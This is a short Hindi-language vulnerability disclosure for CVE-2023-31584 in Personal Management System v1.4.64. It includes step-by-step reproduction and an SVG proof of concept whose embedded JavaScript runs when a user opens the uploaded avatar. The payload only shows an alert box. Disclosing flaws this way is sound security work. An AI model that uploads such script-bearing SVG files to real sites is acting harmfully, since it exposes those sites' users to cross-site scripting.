
CVE-2023-31584 के लिए सार्वजनिक प्रकटीकरण।
पर्सनल मैनेजमेंट सिस्टम v1.4.64 में एक मनमाना फ़ाइल अपलोड भेद्यता, हमलावरों को उपयोगकर्ता प्रोफ़ाइल के अवतार में एक तैयार SVG फ़ाइल अपलोड करके मनमाना कोड निष्पादित करने की अनुमति देती है।
[अतिरिक्त जानकारी] 1.) निम्नलिखित सामग्री के सा�ए alert.svg बनाएं:
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("huntr.dev");
</script>
</svg>
2.) .SVG को वेबसर्वर पर होस्ट करें।
3.) .SVG को अवतार छवि के रूप में अपलोड करें। 4.) जब उपयोगकर्ता अवतार को किसी अलग टैब में खोलता है, तो .SVG फ़ाइल में संग्रहीत जावास्क्रिप्ट निष्पादित हो जाती है।
संदर्भ: https://github.com/Volmarg/personal-management-system